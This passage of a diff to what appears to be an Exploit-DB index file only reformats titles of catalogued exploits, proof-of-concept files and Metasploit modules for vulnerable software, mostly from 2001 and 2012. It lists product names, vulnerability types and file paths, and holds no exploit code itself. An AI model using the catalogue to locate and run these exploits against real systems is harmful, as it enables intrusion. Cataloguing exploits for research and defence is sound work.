K",cgi,remote,0 20643,platforms/windows/webapps/20643.txt,"ManageEngine OpUtils 6.0 - Stored XSS",2012-08-18,loneferret,windows,webapps,7080 -20645,platforms/linux/local/20645.c,"Elm 2.5.3 Alternative-Folder Buffer Overflow",2001-02-13,_kiss_,linux,local,0 +20645,platforms/linux/local/20645.c,"Elm 2.5.3 - Alternative-Folder Buffer Overflow",2001-02-13,_kiss_,linux,local,0 20646,platforms/unix/remote/20646.c,"LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow",2000-12-26,"Stan Bubrouski",unix,remote,0 -20647,platforms/windows/remote/20647.c,"Atrium Software Mercur Mail Server 3.3 EXPN Buffer Overflow",2001-02-23,"Martin Rakhmanoff",windows,remote,0 +20647,platforms/windows/remote/20647.c,"Atrium Software Mercur Mail Server 3.3 - EXPN Buffer Overflow",2001-02-23,"Martin Rakhmanoff",windows,remote,0 20648,platforms/solaris/remote/20648.c,"Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow",2001-03-15,"Last Stage of Delirium",solaris,remote,0 20649,platforms/solaris/remote/20649.pm,"Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow (Metasploit)",2001-03-15,vlad902,solaris,remote,0 -20650,platforms/windows/dos/20650.txt,"Sapio WebReflex 1.55 GET Denial of Service",2001-02-27,slipy,windows,dos,0 +20650,platforms/windows/dos/20650.txt,"Sapio WebReflex 1.55 - GET Denial of Service",2001-02-27,slipy,windows,dos,0 20651,platforms/windows/local/20651.txt,"datawizards ftpxq 2.0.93 - Directory Traversal",2001-02-28,joetesta,windows,local,0 20652,platforms/hardware/remote/20652.txt,"Cisco IOS 11.x/12.0 - ILMI SNMP Community String",2001-02-27,pask,hardware,remote,0 20653,platforms/windows/remote/20653.txt,"SunFTP 1.0 Build 9 - Unauthorized File Access",2001-03-02,se00020,windows,remote,0 @@ -17981,7 +17977,7 @@ id,file,description,date,author,platform,type,port 20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0 b - Malformed Request Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0 20660,platforms/unix/remote/20660.txt,"KICQ 1.0 - Remote Arbitrary Command Execution",2001-02-14,"Marc Roessler",unix,remote,0 20661,platforms/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal",2001-03-06,se00020,windows,remote,0 -20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0 +20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0 20663,platforms/windows/remote/20663.txt,"whitsoft slimserve ftpd 1.0/2.0 - Directory Traversal",2001-02-28,joetesta,windows,remote,0 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos,0 20665,platforms/php/webapps/20665.txt,"T-dah Webmail - CSRF / Stored XSS",2012-08-20,"Yakir Wizman",php,webapps,0 @@ -17992,8 +17988,8 @@ id,file,description,date,author,platform,type,port 20709,platforms/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Password Change CSRF",2012-08-22,"Shai rod",php,webapps,0 20710,platforms/php/webapps/20710.html,"VamCart 0.9 - CSRF",2012-08-22,DaOne,php,webapps,0 20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - learn-msg.cgi Command Injection",2012-08-22,Metasploit,cgi,webapps,0 -20671,platforms/php/webapps/20671.html,"PG Portal Pro CSRF",2012-08-20,Noxious,php,webapps,0 -20672,platforms/php/webapps/20672.py,"Hivemail Webmail Multiple Stored XSS Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 +20671,platforms/php/webapps/20671.html,"PG Portal Pro - CSRF",2012-08-20,Noxious,php,webapps,0 +20672,platforms/php/webapps/20672.py,"Hivemail Webmail - Multiple Stored XSS Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload",2012-08-22,Metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Stored XSS",2012-08-20,"Shai rod",php,webapps,0 @@ -18003,21 +17999,21 @@ id,file,description,date,author,platform,type,port 20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 - Telnet Client File Overwrite",2001-03-09,"Oliver Friedrichs",windows,remote,0 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - DoS",2001-01-22,honoriak,windows,dos,0 20682,platforms/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - DoS",2001-03-09,Phiber,windows,dos,0 -20683,platforms/cgi/remote/20683.txt,"Ikonboard 2.1.7 b Remote File Disclosure",2001-03-11,"Martin J. Muench",cgi,remote,0 -20684,platforms/solaris/local/20684.c,"Solaris 2.5/2.6/7.0/8 tip Buffer Overflow",2001-03-27,"Pablo Sor",solaris,local,0 +20683,platforms/cgi/remote/20683.txt,"Ikonboard 2.1.7 b - Remote File Disclosure",2001-03-11,"Martin J. Muench",cgi,remote,0 +20684,platforms/solaris/local/20684.c,"Solaris 2.5/2.6/7.0/8 tip - Buffer Overflow",2001-03-27,"Pablo Sor",solaris,local,0 20685,platforms/multiple/remote/20685.txt,"IBM Net.Commerce 3.1/3.2 WebSphere Weak Password",2001-03-07,"Rudi Carell",multiple,remote,0 20686,platforms/cgi/remote/20686.txt,"Free Online Dictionary of Computing 1.0 - Remote File Viewing",2001-03-09,Cgisecurity,cgi,remote,0 20687,platforms/windows/remote/20687.txt,"OReilly Software WebSite Professional 2.5.4 - Directory Disclosure",2001-03-16,"Roberto Moreno",windows,remote,0 20688,platforms/windows/remote/20688.txt,"Qualcomm Eudora 5.0.2 - 'Use Microsoft Viewer' Code Execution",2001-03-18,http-equiv,windows,remote,0 20689,platforms/cgi/remote/20689.pl,"SWSoft ASPSeek 1.0 - s.cgi Buffer Overflow",2001-03-19,teleh0r,cgi,remote,0 20690,platforms/linux/remote/20690.sh,"wu-ftpd 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPD 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion",2001-03-15,"Frank DENIS",linux,remote,0 -20691,platforms/linux/local/20691.txt,"FTPFS 0.1.1/0.2.1/0.2.2 mount Buffer Overflow",2001-03-13,"Frank DENIS",linux,local,0 +20691,platforms/linux/local/20691.txt,"FTPFS 0.1.1/0.2.1/0.2.2 - mount Buffer Overflow",2001-03-13,"Frank DENIS",linux,local,0 20692,platforms/multiple/remote/20692.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (1)",2001-06-13,rfp,multiple,remote,0 20693,platforms/multiple/remote/20693.c,"Apache 1.3 - Artificially Long Slash Path Directory Listing (2)",2002-02-21,st0ic,multiple,remote,0 20694,platforms/multiple/remote/20694.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (3)",2001-06-13,farm9,multiple,remote,0 20695,platforms/multiple/remote/20695.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (4)",2001-06-13,farm9,multiple,remote,0 20696,platforms/windows/dos/20696.txt,"Alt-N MDaemon 3.5.6/5.0.7/6.x - IMAP DoS",2001-03-23,nitr0s,windows,dos,0 -20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow",2001-03-19,"Luciano Rocha",unix,local,0 +20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched - Long Error Message Buffer Overflow",2001-03-19,"Luciano Rocha",unix,local,0 20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi",2012-08-21,loneferret,php,webapps,0 20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow (Metasploit)",2012-08-21,"Matt Andreko",windows,remote,0 @@ -18030,12 +18026,12 @@ id,file,description,date,author,platform,type,port 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0 / Weblogic Server 5.1 - URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",multiple,remote,0 20720,platforms/linux/local/20720.c,"Linux Kernel 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 20721,platforms/linux/local/20721.c,"Linux Kernel 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (2)",2001-03-27,"Wojciech Purczynski",linux,local,0 -20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0 +20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 - JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 - User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0 20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0 20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Remote Arbitrary Commands",2001-04-02,"UkR hacking team",cgi,remote,0 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",windows,remote,0 -20727,platforms/linux/remote/20727.c,"Ntpd Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0 +20727,platforms/linux/remote/20727.c,"Ntpd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0 20728,platforms/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service",2001-04-05,nitr0s,windows,dos,0 20729,platforms/php/webapps/20729.txt,"PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change",2001-04-02,"Juan Diego",php,webapps,0 20730,platforms/unix/remote/20730.c,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0 @@ -18043,17 +18039,17 @@ id,file,description,date,author,platform,type,port 20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd - glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x-2.8 ftpd - glob() Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0 20734,platforms/hardware/dos/20734.sh,"Cisco PIX 4.x/5.x TACACS+ - Denial of Service",2001-04-06,"Claudiu Calomfirescu",hardware,dos,0 -20735,platforms/sco/dos/20735.txt,"SCO OpenServer 5.0.6 lpadmin Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 -20736,platforms/sco/dos/20736.txt,"SCO Open Server 5.0.6 lpforms Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 -20737,platforms/sco/dos/20737.txt,"SCO Open Server 5.0.6 lpshut Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 +20735,platforms/sco/dos/20735.txt,"SCO OpenServer 5.0.6 - lpadmin Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 +20736,platforms/sco/dos/20736.txt,"SCO Open Server 5.0.6 - lpforms Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 +20737,platforms/sco/dos/20737.txt,"SCO Open Server 5.0.6 - lpshut Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 20738,platforms/multiple/remote/20738.txt,"PGP 5.x/6.x/7.0 - ASCII Armor Parser Arbitrary File Creation",2001-04-09,"Chris Anley",multiple,remote,0 -20739,platforms/sco/dos/20739.txt,"SCO Open Server 5.0.6 lpusers Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 -20740,platforms/solaris/local/20740.c,"Solaris 7/8 kcms_configure Command-Line Buffer Overflow (1)",2001-04-09,"Riley Hassell",solaris,local,0 -20741,platforms/solaris/local/20741.c,"Solaris 7/8 kcms_configure Command-Line Buffer Overflow (2)",2001-04-09,"Adam Slattery",solaris,local,0 -20742,platforms/sco/dos/20742.txt,"SCO Open Server 5.0.6 recon Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 +20739,platforms/sco/dos/20739.txt,"SCO Open Server 5.0.6 - lpusers Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 +20740,platforms/solaris/local/20740.c,"Solaris 7/8 kcms_configure - Command-Line Buffer Overflow (1)",2001-04-09,"Riley Hassell",solaris,local,0 +20741,platforms/solaris/local/20741.c,"Solaris 7/8 kcms_configure - Command-Line Buffer Overflow (2)",2001-04-09,"Adam Slattery",solaris,local,0 +20742,platforms/sco/dos/20742.txt,"SCO Open Server 5.0.6 - recon Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 20743,platforms/solaris/local/20743.c,"Solaris 2.x/7.0/8 Xsun HOME Buffer Overflow",2001-04-10,"Riley Hassell",solaris,local,0 20744,platforms/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 - Arbitrary Code Execution",2001-04-10,Kanedaaa,cgi,remote,0 -20745,platforms/solaris/remote/20745.txt,"Solaris 2.6/7.0 IN.FTPD CWD Username Enumeration",2001-04-11,"Johnny Cyberpunk",solaris,remote,0 +20745,platforms/solaris/remote/20745.txt,"Solaris 2.6/7.0 - IN.FTPD CWD Username Enumeration",2001-04-11,"Johnny Cyberpunk",solaris,remote,0 20746,platforms/palm_os/local/20746.c,"Strip Password Generator 0.3/0.4/0.5 Limited Password-Space",2001-04-10,"Thomas Roessler",palm_os,local,0 20747,platforms/linux/dos/20747.txt,"Oracle Application Server 4.0.8.2 - ndwfn4.so Buffer Overflow",2001-04-11,"Fyodor Yarochkin",linux,dos,0 20748,platforms/linux/remote/20748.pl,"cfingerd 1.4 - Format String (1)",2001-04-11,Lez,linux,remote,0 @@ -18065,15 +18061,15 @@ id,file,description,date,author,platform,type,port 20761,platforms/php/webapps/20761.txt,"Ad Manager Pro 4 - LFI",2012-08-23,CorryL,php,webapps,0 20762,platforms/php/webapps/20762.php,"webpa 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 20763,platforms/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy - DoS",2001-04-16,"SecureXpert Labs",windows,dos,0 -20944,platforms/windows/remote/20944.rb,"SAP NetWeaver HostControl Command Injection",2012-08-31,Metasploit,windows,remote,0 +20944,platforms/windows/remote/20944.rb,"SAP NetWeaver HostControl - Command Injection",2012-08-31,Metasploit,windows,remote,0 20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 - Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0 20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 -20764,platforms/solaris/remote/20764.txt,"Solaris 2.6 FTP Core Dump Shadow Password Recovery",2001-04-17,warning3,solaris,remote,0 +20764,platforms/solaris/remote/20764.txt,"Solaris 2.6 - FTP Core Dump Shadow Password Recovery",2001-04-17,warning3,solaris,remote,0 20765,platforms/linux/remote/20765.pl,"Linux Kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote,0 20766,platforms/unix/local/20766.c,"SGI IRIX 6.5 / Solaris 7.0/8 - CDE dtsession Buffer Overflow",2001-04-11,"Last Stage of Delirium",unix,local,0 -20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0 -20768,platforms/solaris/local/20768.c,"Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow (2)",1999-12-01,"Last Stage of Delirium",solaris,local,0 +20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0 +20768,platforms/solaris/local/20768.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (2)",1999-12-01,"Last Stage of Delirium",solaris,local,0 20769,platforms/unix/local/20769.txt,"Siemens Reliant UNIX 5.4 - ppd -T Race Condition",2001-04-14,"Ruiz Garcia",unix,local,0 20770,platforms/windows/dos/20770.txt,"GoAhead Software GoAhead Webserver (Windows) 2.1 - Denial of Service",2001-04-17,nemesystm,windows,dos,0 20771,platforms/windows/dos/20771.txt,"Simpleserver WWW 1.0.x - AUX Directory Denial of Service",2001-04-17,nemesystm,windows,dos,0 @@ -18097,7 +18093,7 @@ id,file,description,date,author,platform,type,port 20790,platforms/php/webapps/20790.py,"businesswiki 2.5rc3 - Stored XSS / arbitrary file upload",2012-08-24,"Shai rod",php,webapps,0 20791,platforms/unix/remote/20791.php,"Netscape Navigator 4.0.8 - 'about:' Domain Information Disclosure",2001-04-09,"Florian Wesch",unix,remote,0 20792,platforms/multiple/dos/20792.txt,"Mercury/NLM 1.4 - Buffer Overflow",2001-04-21,"Przemyslaw Frasunek",multiple,dos,0 -20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote,0 +20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 - Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote,0 20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0 20795,platforms/linux/local/20795.sh,"Sendfile 1.x/2.1 - Local Privileged Arbitrary Command Execution",2001-04-24,psheep,linux,local,0 20796,platforms/linux/remote/20796.rb,"Zabbix Server - Arbitrary Command Execution",2012-08-27,Metasploit,linux,remote,0 @@ -18125,7 +18121,7 @@ id,file,description,date,author,platform,type,port 20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow (4)",2001-05-01,"Cyrus The Great",windows,remote,0 20819,platforms/windows/remote/20819.txt,"BRS WebWeaver 0.x - FTP Root Path Disclosure",2001-04-28,joetesta,windows,remote,0 20820,platforms/windows/remote/20820.c,"Nullsoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote,0 -20821,platforms/hardware/dos/20821.txt,"Cisco HSRP Denial of Service",2001-05-03,bashis,hardware,dos,0 +20821,platforms/hardware/dos/20821.txt,"Cisco HSRP - Denial of Service",2001-05-03,bashis,hardware,dos,0 20822,platforms/linux/local/20822.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (1)",2001-05-07,"Sebastian Krahmer",linux,local,0 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,linux,local,0 20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0 @@ -18154,11 +18150,11 @@ id,file,description,date,author,platform,type,port 20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 - HTTP Port Router DoS",2001-09-21,Sniffer,hardware,dos,0 20848,platforms/php/webapps/20848.txt,"PHPSlash 0.5.3 2/0.6.1 - URL Block Arbitrary File Disclosure",2001-04-15,"tobozo tagada",php,webapps,0 20849,platforms/cgi/remote/20849.pl,"DCForum 6.0 - Remote Admin Privilege Compromise",2001-05-08,"Franklin DeMatto",cgi,remote,0 -20850,platforms/windows/remote/20850.txt,"Pacific Software Carello 1.2.1 Shopping Cart Command Execution",2001-05-14,"Peter Gründl",windows,remote,0 +20850,platforms/windows/remote/20850.txt,"Pacific Software Carello 1.2.1 Shopping Cart - Command Execution",2001-05-14,"Peter Gründl",windows,remote,0 20851,platforms/sco/local/20851.txt,"SCO OpenServer 5.0.x - StartX Weak XHost Permissions",2001-05-07,"Richard Johnson",sco,local,0 20852,platforms/multiple/dos/20852.pl,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (1)",2001-05-15,"Santi Claus",multiple,dos,0 20853,platforms/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (2)",2001-05-15,"Gabriel Maggiotti",multiple,dos,0 -20854,platforms/windows/dos/20854.txt,"IIS 5.0 WebDav Lock Method Memory Leak DoS",2001-05-17,"Defcom Labs",windows,dos,0 +20854,platforms/windows/dos/20854.txt,"IIS 5.0 - WebDav Lock Method Memory Leak DoS",2001-05-17,"Defcom Labs",windows,dos,0 20855,platforms/php/webapps/20855.txt,"Wiki Web Help 0.3.9 - Multiple Stored XSS Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Stored XSS Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 @@ -18171,33 +18167,33 @@ id,file,description,date,author,platform,type,port 20866,platforms/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps,0 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client - inetd.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 -20869,platforms/multiple/remote/20869.html,"eSafe Gateway 2.1 Script-filtering Bypass",2001-05-20,"eDvice Security Services",multiple,remote,0 +20869,platforms/multiple/remote/20869.html,"eSafe Gateway 2.1 - Script-filtering Bypass",2001-05-20,"eDvice Security Services",multiple,remote,0 20870,platforms/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow PoC",2012-08-28,LiquidWorm,windows,dos,0 20871,platforms/php/webapps/20871.txt,"CommPort 1.01 - Multiple Vulnerabilities",2012-08-28,"Jean Pascal Pereira",php,webapps,0 20872,platforms/php/webapps/20872.txt,"mieric addressBook 1.0 - SQL Injection",2012-08-28,"Jean Pascal Pereira",php,webapps,0 -20873,platforms/php/webapps/20873.html,"RV Article Publisher CSRF",2012-08-28,DaOne,php,webapps,0 -20874,platforms/php/webapps/20874.html,"RV Shopping Cart CSRF",2012-08-28,DaOne,php,webapps,0 -20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0 -20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab'n'Go and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0 +20873,platforms/php/webapps/20873.html,"RV Article Publisher - CSRF",2012-08-28,DaOne,php,webapps,0 +20874,platforms/php/webapps/20874.html,"RV Shopping Cart - CSRF",2012-08-28,DaOne,php,webapps,0 +20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 - ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0 +20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab'n'Go and Sitecom Storage Center - Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0 20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal",2001-05-23,joetesta,cgi,remote,0 20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6 / HP-UX 10/11 / Solaris 2.6/7.0/8 - rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0 20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers",2001-05-24,"Georgi Guninski",windows,local,0 20881,platforms/multiple/remote/20881.txt,"Beck IPC GmbH IPC@CHIP TelnetD Login Account Brute Force",2001-05-24,"Courtesy Sentry Research Labs",multiple,remote,0 20882,platforms/multiple/remote/20882.txt,"faust informatics freestyle chat 4.1 sr2 - Directory Traversal",2001-05-25,nemesystm,multiple,remote,0 -20883,platforms/windows/dos/20883.txt,"Faust Informatics Freestyle Chat 4.1 SR2 MS-DOS Device Name DoS",2001-05-25,nemesystm,windows,dos,0 +20883,platforms/windows/dos/20883.txt,"Faust Informatics Freestyle Chat 4.1 SR2 MS-DOS Device Name - DoS",2001-05-25,nemesystm,windows,dos,0 20884,platforms/windows/remote/20884.txt,"ACLogic CesarFTP 0.98b - Directory Traversal",2001-05-27,byterage,windows,remote,0 -20885,platforms/solaris/local/20885.c,"Solaris 8 mailtool Buffer Overflow",2001-06-01,51,solaris,local,0 +20885,platforms/solaris/local/20885.c,"Solaris 8 mailtool - Buffer Overflow",2001-06-01,51,solaris,local,0 20886,platforms/windows/remote/20886.txt,"Omnicron OmniHTTPD 2.0.4-8 - File Source Disclosure",2001-05-26,astral,windows,remote,0 20887,platforms/cgi/remote/20887.txt,"Cosmicperl Directory Pro 2.0 - Arbitrary File Disclosure",2001-05-28,Marshal,cgi,remote,0 -20888,platforms/windows/remote/20888.txt,"Qualcomm Eudora 5.1 Hidden Attachment Execution",2001-05-29,http-equiv,windows,remote,0 +20888,platforms/windows/remote/20888.txt,"Qualcomm Eudora 5.1 - Hidden Attachment Execution",2001-05-29,http-equiv,windows,remote,0 20889,platforms/multiple/remote/20889.txt,"GNU Privacy Guard 1.0.x - Format String",2001-05-29,"fish stiqz",multiple,remote,0 20890,platforms/multiple/remote/20890.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 - HTML tag Script-filtering Bypass",2001-05-29,"eDvice Security Services",multiple,remote,0 -20891,platforms/multiple/remote/20891.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 Unicode Script-filtering Bypass",2001-05-29,"eDvice Security Services",multiple,remote,0 +20891,platforms/multiple/remote/20891.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 - Unicode Script-filtering Bypass",2001-05-29,"eDvice Security Services",multiple,remote,0 20892,platforms/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String",2001-03-25,"Jacek Lipkowski",hardware,remote,0 20893,platforms/windows/remote/20893.txt,"Trend Micro InterScan VirusWall for Windows NT 3.4/3.5/3.51 - Remote Reconfiguration",2001-05-24,snsadv,windows,remote,0 20894,platforms/multiple/remote/20894.txt,"Acme.Serve 1.7 - Arbitrary File Access",2001-05-31,"Adnan Rahman",multiple,remote,0 20895,platforms/cgi/remote/20895.txt,"WebTrends Enterprise Reporting Server 3.1 c/3.5 - Source Code Disclosure",2001-06-03,"Auriemma Luigi",cgi,remote,0 -20896,platforms/windows/remote/20896.txt,"OReilly Software WebBoard 4.10.30 Pager Hostile JavaScript",2001-06-02,"Helmuth Antholzer",windows,remote,0 +20896,platforms/windows/remote/20896.txt,"OReilly Software WebBoard 4.10.30 - Pager Hostile JavaScript",2001-06-02,"Helmuth Antholzer",windows,remote,0 20897,platforms/linux/local/20897.sh,"Debian 2.1/2.2 - Man Cache File Creation",2001-06-01,jenggo,linux,local,0 20898,platforms/linux/local/20898.sh,"RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation",2001-05-18,jenggo,linux,local,0 20899,platforms/windows/remote/20899.txt,"Microsoft Outlook 97/98/2000/4/5 - Address Book Spoofing",2001-06-05,3APA3A,windows,remote,0 @@ -18210,25 +18206,25 @@ id,file,description,date,author,platform,type,port 20906,platforms/unix/local/20906.c,"kosch suid wrapper 1.1.1 - Buffer Overflow",2001-06-07,dex,unix,local,0 20907,platforms/windows/dos/20907.sh,"Microsoft Windows 2000 - Telnet Username DoS",2001-06-07,"Michal Zalewski",windows,dos,0 20908,platforms/linux/remote/20908.c,"Xinetd 2.1.8 - Buffer Overflow",2001-06-28,qitest1,linux,remote,0 -20909,platforms/multiple/remote/20909.txt,"IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution",2001-06-08,"Milo van der Zee",multiple,remote,0 +20909,platforms/multiple/remote/20909.txt,"IBM Tivoli NetView 5/6 - OVActionD SNMPNotify Command Execution",2001-06-08,"Milo van der Zee",multiple,remote,0 20910,platforms/windows/remote/20910.pl,"TransSoft Broker FTP Server 3.0/4.0/4.7/5.x - CWD Buffer Overflow",2001-06-10,byterage,windows,remote,0 -20911,platforms/osx/remote/20911.txt,"Apache 1.3.14 Mac File Protection Bypass",2001-06-10,"Stefan Arentz",osx,remote,0 -20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification",2001-06-12,"SNS Advisory",windows,remote,0 +20911,platforms/osx/remote/20911.txt,"Apache 1.3.14 - Mac File Protection Bypass",2001-06-10,"Stefan Arentz",osx,remote,0 +20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 - Configurations Modification",2001-06-12,"SNS Advisory",windows,remote,0 20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments - Blind SQL Injection",2012-08-29,Spy_w4r3,php,webapps,0 20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 - Administrator 